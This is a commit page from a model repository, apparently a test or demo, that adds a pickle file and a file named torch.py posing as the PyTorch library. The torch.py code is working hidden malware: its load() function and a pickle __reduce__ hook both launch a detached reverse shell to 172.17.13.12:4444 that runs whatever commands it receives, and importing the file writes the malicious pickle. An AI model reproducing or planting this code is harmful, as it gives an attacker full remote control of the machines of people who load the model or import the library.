tester-123456789
/

test_model

Model card Files Files and versions

dkteg commited on May 19, 2025

Commit

de44477

·

1 Parent(s): d21e5ba

overloaded library

Files changed (2) hide show

payload.pkl +3 -0
torch.py +76 -0

payload.pkl ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:0cb03a4cf2ac85f7c466a9672f7d22cbd601afe56dcbd215b9520746a381150f
+size 56

torch.py ADDED Viewed

	@@ -0,0 +1,76 @@

+from typing import Optional, Any
+import pickle
+def spawn_detached_shell(attacker_ip="172.17.13.12", attacker_port=4444):
+    import sys
+    import subprocess
+    import os
+    code = f'''
+import socket
+import subprocess
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("{attacker_ip}", {attacker_port}))
+while True:
+    s.send(b"$ ")
+    cmd = s.recv(1024).decode()
+    if cmd.strip() in {{"exit", "quit"}}:
+        break
+    try:
+        output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
+    except subprocess.CalledProcessError as e:
+        output = e.output
+    s.send(output)
+s.close()
+'''
+    if sys.platform == "win32":
+        DETACHED_PROCESS = 0x00000008
+        subprocess.Popen([sys.executable, "-c", code],
+                         creationflags=DETACHED_PROCESS,
+                         stdout=subprocess.DEVNULL,
+                         stderr=subprocess.DEVNULL,
+                         stdin=subprocess.DEVNULL,
+                         close_fds=True)
+    else:
+        # Unix-like: start new session to detach process
+        subprocess.Popen([sys.executable, "-c", code],
+                         stdout=subprocess.DEVNULL,
+                         stderr=subprocess.DEVNULL,
+                         stdin=subprocess.DEVNULL,
+                         preexec_fn=os.setsid,
+                         close_fds=True)
+class FileLike:
+    pass
+class _utils:
+    def __reduce__(self):
+        return (_utils._rebuild_tensor_v2, ())
+    @staticmethod
+    def _rebuild_tensor_v2(*args, **kwargs):
+       spawn_detached_shell()
+def load(
+    f: FileLike,
+    map_location = None,
+    pickle_module: Any = None,
+    *,
+    weights_only: Optional[bool] = None,
+    mmap: Optional[bool] = None,
+    **pickle_load_args: Any,
+):
+    spawn_detached_shell()
+with open("payload.pkl", "wb") as f:
+    pickle.dump(_utils(), f)
+# import pickletools
+# with open("payload.pkl", "rb") as f:
+#     # pickletools.dis(f)
+#     pickle.load(f)